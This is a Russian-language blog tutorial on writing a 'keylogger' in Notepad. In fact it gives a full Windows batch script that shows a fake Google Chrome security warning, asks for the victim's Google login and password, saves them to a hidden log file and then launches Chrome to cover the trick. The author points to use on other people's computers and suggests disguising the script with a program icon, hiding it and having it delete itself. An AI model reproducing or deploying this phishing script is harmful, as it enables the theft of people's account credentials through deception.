Как написать кейлоггер своими руками?

В этой статье описывается процесс создания простого кейлоггера с элементами социальной инженерии, который официально попросит ввести нужную информацию от пользователя, сохранив её незаметно от глаз в специальную папку. После чего окно закроется, и запустится нужная вам программа. При этом, если пользователь купится на “утку”, введённые логин и пароль останутся в специальном файле. Сейчас вы увидите, что написать настоящий кейлоггер своими руками очень просто. Естественно, что никакой антивирус тут будет “не при делах”.

написать кейлоггер своими руками

В статье Что такое кейлоггер? мы познакомились с понятием, а также увидели ряд программ, которые позволяют отслеживать “стучание по клавишам”. Пользователи должны понимать, что наработка, установка и использование кейлоггера не всегда носит отрицательный оттенок. Он может носить форму нормального во многих ситуациях родительского контроля над некоторыми юными пользователями Windows, или же обычного “прикола” над друзьями. Так что рассмотрим ручное написание простенького кейлоггера без применения программ со стороны. И с помощью привычного Блокнота Windows.

Блокнот-то Блокнотом, но я, по сложившейся уже привычке, использую продвинутую его версию Notepad++, так что не удивляйтесь необычным окнам на фото. Тем более, что именно она позволяет “переводить” кириллические слова в сообщении, которое призовёт пользователя к действию. Это делается в панели инструментов документа

Кодировки->Кодировки->Кириллица->ОЕМ 855 (ОЕМ 866)

кейлоггер в блокноте

Далее. Я покажу вам принцип создания кейлоггера своими руками. Поверьте – пораскинув мозгами и решив несколько простых задач даже такой кейлоггер можно “довести до ума”. Мне на этом сайте этого просто не дадут сделать, и статейку быстро заблокируют. Так что воспринимайте информацию как пищу для размышлений, а не готовый инструмент.

Как написать кейлоггер: поехали

Перед тем, как кейлоггер заработает, от вас понадобится несколько движений:

  • создать папку для хранения введённых паролей и логинов
  • создать тело кейлоггера

Готовим хранилище для вводимого

Здесь всё просто: вам нужен кратчайший путь (но он может быть абсолютно любым, в том числе сетевым). У меня это корень диска С. Здесь создаётся папка logs. Здесь вы будете искать обычный файл logs.txt (его создаст уже сам кейлоггер).

папка logs с информацией по паролям

украденный пароль
Блокнот по-русски не понимает, но латинские символы читает: что здесь что – понятно и так

Напишем кейлоггер своими руками: сам код

  • открываем окно Notepad++ и вводим следующий код (содержание сообщения к пользователю – произвольное):
@echo off
color b
title ПРОВЕРКА ПРАВИЛЬНОСТИ ВВОДА ПАРОЛЯ
cls
echo СИСТЕМА БЕЗОПАСНОСТИ БРАУЗЕРА GOOGLE CHROME & echo.ОБНАРУЖИЛА ПОПЫТКУ НЕСАНКЦИОНИРОВАННОГО ДОСТУПА К НЕКОТОРЫМ ЕЁ ФУНКЦИЯМ.& echo.ПРОГРАММА ЗАПУЩЕНА В БЕЗОПАСНОМ РЕЖИМЕ С МИНИМАЛЬНЫМИ НАСТРОЙКАМИ.& echo.ДЛЯ ДАЛЬНЕЙШЕЙ РАБОТЫ УКАЖИТЕ ЛОГИН И ПАРОЛЬ УЧЁТНОЙ ЗАПИСИ GOOGLE:
echo.
echo.
cd "C:\logs"
set /p user=Логин:
set /p pass=Пароль:
echo Логин="%user%" Пароль="%pass%" >> Log.txt
cd C:\Program Files (x86)\Google\Chrome\Application\
start chrome.exe
exit

кейлоггер требует пароль от google

Взглянув на окно консоли, появляющейся после запуска кейлоггера, вы поймёте какая команда за что отвечает. Хотелось бы только заострить внимание на части кода & echo. , который отвечает за перенос строк написанного сообщения. Учитывая, что он может быть произвольным, просто выставляйте & echo. в разрывы предложений для удобочитаемости. В строке cd должен быть указан путь к папке той программы, которая (по вашему замыслу) и должна запуститься после ввода пароля. Если кейлоггер (совершенно случайно) окажется на чужом компьютере, вам лучше заранее осведомиться о разрядности системы: пути к программам в 32-х и 64-х битных архитектурах Windows отличаются. Завершит работу кейлоггера строка start, которая указывает на исполнительный файл нужной программы. Да, вернусь к началу скрипта: цветность сообщения можно тоже  подбирать самостоятельно. За него отвечает строка color. Выбирайте a, b, c и т.д.

Всё. Проверьте, как работает. Когда освоитесь, кейлоггер можно усовершенствовать. Так, можно без труда создать для него ярлык со значком понравившейся программы, сам кейлоггер спрятать, сделав невидимым, уничтожить после первого запуска и т.п. В общем, я заканчиваю, а вы дерзайте.

Успехов всем.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Максимальный размер загружаемого файла: 50 МБ. Вы можете загрузить: изображение, видео. Ссылки на YouTube, Facebook, Twitter и другие сервисы, вставленные в текст комментария, будут автоматически встроены. Перетащите файлы сюда